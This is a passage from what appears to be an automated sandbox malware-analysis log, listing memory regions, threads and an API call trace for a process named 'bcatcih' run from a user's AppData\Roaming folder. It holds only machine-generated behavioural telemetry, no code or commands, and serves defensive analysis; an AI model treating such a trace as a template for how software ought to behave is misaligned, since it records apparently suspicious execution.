"c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2346 start_va = 0x7ffb25850000 end_va = 0x7ffb25e93fff monitored = 0 entry_point = 0x7ffb25a164b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 2347 start_va = 0x7ffb28a50000 end_va = 0x7ffb28af6fff monitored = 0 entry_point = 0x7ffb28a658d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2348 start_va = 0x7ffb262e0000 end_va = 0x7ffb26331fff monitored = 0 entry_point = 0x7ffb262ef530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2349 start_va = 0x7ffb25120000 end_va = 0x7ffb2512efff monitored = 0 entry_point = 0x7ffb25123210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2350 start_va = 0x7ffb256b0000 end_va = 0x7ffb25764fff monitored = 0 entry_point = 0x7ffb256f22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 2351 start_va = 0x7ffb25130000 end_va = 0x7ffb2517afff monitored = 0 entry_point = 0x7ffb251335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2352 start_va = 0x7ffb25180000 end_va = 0x7ffb25193fff monitored = 0 entry_point = 0x7ffb251852e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2357 start_va = 0x7ffb23aa0000 end_va = 0x7ffb23b35fff monitored = 0 entry_point = 0x7ffb23ac5570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 2360 start_va = 0x50000 end_va = 0x6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2381 start_va = 0x1e10000 end_va = 0x2146fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2382 start_va = 0x2150000 end_va = 0x236efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 2383 start_va = 0x2370000 end_va = 0x2584fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002370000" filename = "" Region: id = 2384 start_va = 0x4b0000 end_va = 0x5c5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 2385 start_va = 0x5e0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 2386 start_va = 0x2590000 end_va = 0x27a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 2387 start_va = 0x27b0000 end_va = 0x28befff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027b0000" filename = "" Region: id = 2395 start_va = 0x440000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2396 start_va = 0x7ffb28080000 end_va = 0x7ffb281d9fff monitored = 0 entry_point = 0x7ffb280c38e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2398 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2399 start_va = 0x60000 end_va = 0x6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2400 start_va = 0x28c0000 end_va = 0x297bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028c0000" filename = "" Region: id = 2401 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2402 start_va = 0x7ffb229b0000 end_va = 0x7ffb229d1fff monitored = 0 entry_point = 0x7ffb229b1a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 2403 start_va = 0x7ffb23860000 end_va = 0x7ffb23872fff monitored = 0 entry_point = 0x7ffb23862760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2404 start_va = 0x7ffb24f30000 end_va = 0x7ffb24f85fff monitored = 0 entry_point = 0x7ffb24f40bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2405 start_va = 0x70000 end_va = 0x76fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2406 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 2407 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 2408 start_va = 0x1e0000 end_va = 0x1e1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 2409 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 2410 start_va = 0x480000 end_va = 0x484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 2415 start_va = 0x490000 end_va = 0x490fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 2421 start_va = 0x5d0000 end_va = 0x5d1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 2422 start_va = 0x2980000 end_va = 0x2b75fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002980000" filename = "" Region: id = 2423 start_va = 0x7ffb1c1d0000 end_va = 0x7ffb1c443fff monitored = 0 entry_point = 0x7ffb1c240400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 2424 start_va = 0x2b80000 end_va = 0x2b80fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 2425 start_va = 0x2b90000 end_va = 0x2b91fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b90000" filename = "" Region: id = 2426 start_va = 0x2ba0000 end_va = 0x2c7cfff monitored = 0 entry_point = 0x2bfe0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 2427 start_va = 0x2b80000 end_va = 0x2b80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b80000" filename = "" Region: id = 2428 start_va = 0x2ba0000 end_va = 0x2c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 2429 start_va = 0x2ca0000 end_va = 0x2e9efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002ca0000" filename = "" Thread: id = 152 os_tid = 0x5c0 Thread: id = 153 os_tid = 0xec8 Thread: id = 154 os_tid = 0xf7c Thread: id = 155 os_tid = 0xf54 Process: id = "7" image_name = "bcatcih" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih" page_root = "0x369a4000" os_pid = "0x610" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x60" cmd_line = "C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2366 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2367 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2368 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2369 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2370 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2371 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2372 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2373 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2374 start_va = 0x400000 end_va = 0x4a6fff monitored = 1 entry_point = 0x401b2c region_type = mapped_file name = "bcatcih" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\bcatcih") Region: id = 2375 start_va = 0x778f0000 end_va = 0x77a6afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2376 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2377 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2378 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2379 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2380 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 2486 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 2487 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2488 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2489 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2490 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2491 start_va = 0x520000 end_va = 0x61ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 2633 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2634 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2962 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2963 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2964 start_va = 0x620000 end_va = 0x6ddfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2965 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2970 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 3044 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3045 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3046 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3047 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 3048 start_va = 0x6e0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 3049 start_va = 0x4b0000 end_va = 0x4d9fff monitored = 0 entry_point = 0x4b5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3050 start_va = 0x7e0000 end_va = 0x967fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 3168 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3308 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3309 start_va = 0x4b0000 end_va = 0x4b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 3310 start_va = 0x970000 end_va = 0xaf0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 3311 start_va = 0xb00000 end_va = 0x1efffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b00000" filename = "" Region: id = 3443 start_va = 0x1f00000 end_va = 0x20dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f00000" filename = "" Thread: id = 161 os_tid = 0x51c [0169.379] GetStartupInfoA (in: lpStartupInfo=0x19ff18 | out: lpStartupInfo=0x19ff18*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0169.379] HeapCreate (flOptions=0x0, dwInitialSize=0x1000, dwMaximumSize=0x0) returned 0x20d0000 [0174.294] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0174.294] GetProcAddress (hModule=0x74650000, lpProcName="FlsAlloc") returned 0x7466a980 [0174.295] GetProcAddress (hModule=0x74650000, lpProcName="FlsGetValue") returned 0x74667570 [0174.295] GetProcAddress (hModule=0x74650000, lpProcName="FlsSetValue") returned 0x74669e30 [0174.295] GetProcAddress (hModule=0x74650000, lpProcName="FlsFree") returned 0x74674ff0 [0174.296] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0174.296] GetProcAddress (hModule=0x74650000, lpProcName="EncodePointer") returned 0x7794f730 [0174.296] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0174.297] GetProcAddress (hModule=0x74650000, lpProcName="EncodePointer") returned 0x7794f730 [0174.297] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0174.297] GetProcAddress (hModule=0x74650000, lpProcName="EncodePointer") returned 0x7794f730 [0174.297] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0174.297] GetProcAddress (hModule=0x74650000, lpProcName="EncodePointer") returned 0x7794f730 [0174.297] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0174.297] GetProcAddress (hModule=0x74650000, lpProcName="EncodePointer") returned 0x7794f730 [0174.297] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0174.297] GetProcAddress (hModule=0x74650000, lpProcName="EncodePointer") returned 0x7794f730 [0174.297] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0174.298] GetProcAddress (hModule=0x74650000, lpProcName="EncodePointer") returned 0x7794f730 [0174.298] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0174.298] GetProcAddress (hModule=0x74650000, lpProcName="DecodePointer") returned 0x7794d830 [0174.298] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x214) returned 0x20d05a8 [0174.298] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0174.298] GetProcAddress (hModule=0x74650000, lpProcName="DecodePointer") returned 0x7794d830 [0174.299] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0174.299] GetProcAddress (hModule=0x74650000, lpProcName="EncodePointer") returned 0x7794f730 [0174.299] GetProcAddress (hModule=0x74650000, lpProcName="DecodePointer") returned 0x7794d830 [0174.299] GetCurrentThreadId () returned 0x51c [0174.299] GetStartupInfoA (in: lpStartupInfo=0x19fe9c | out: lpStartupInfo=0x19fe9c*(cb=0x44, lpReserved="", lpDesktop="winsta0\\default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0174.299] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x8, Size=0x800) returned 0x20d07c8 [0174.299] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0174.299] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0174.299] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0174.299] SetHandleCount (uNumber=0x20) returned 0x20 [0174.299] GetCommandLineA () returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\bcatcih" [0174.299] GetEnvironmentStringsW () returned 0x530cd8* [0174.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1291, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1291 [0174.300] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x0, Size=0x50b) returned 0x20d0fd0 [0174.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ALLUSERSPROFILE=C:\\ProgramData", cchWideChar=1291, lpMultiByteStr=0x20d0fd0, cbMultiByte=1291, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ALLUSERSPROFILE=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 1291 [0174.300] FreeEnvironmentStringsW (penv=0x530cd8) returned 1 [0174.300] GetLastError () returned 0x0 [0174.300] SetLastError (dwErrCode=0x0) [0174.300] GetLastError () returned 0x0 [0174.300] SetLastError (dwErrCode=0x0) [0174.300] GetLastError () returned 0x0 [0174.300] SetLastError (dwErrCode=0x0) [0174.300] GetACP () returned 0x4e4 [0174.300] RtlAllocateHeap (HeapHandle=0x20d0000, Flags=0x0, Size=0x220) returned 0x20d14e8 [0174.300] GetLastError () returned 0x0 [0174.300] SetLastError (dwErrCode=0x0) [0174.300] IsValidCodePage (CodePage=0x4e4) returned 1 [0174.300] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19fe7c | out: lpCPInfo=0x19fe7c) returned 1 [0174.300] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x19f948 | out: lpCPInfo=0x19f948) returned 1 [0174.300] GetLastError () returned 0x0 [0174.300] SetLastError (dwErrCode=0x0) [0174.300] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x19f8d8 | out: lpCharType=0x19f8d8) returned 1 [0174.301] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0174.301] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ艱@Ā") returned 256 [0174.301] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ艱@Ā", cchSrc=256, lpCharType=0x19f95c | out: lpCharType=0x19f95c) returned 1 [0174.301] GetLastError () returned 0x0 [0174.301] SetLastError (dwErrCode=0x0) [0174.301] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0174.302] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0174.302] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19fd5c, cbMultiByte=256, lpWideCharStr=0x19f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0174.302] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0174.302] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x19f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 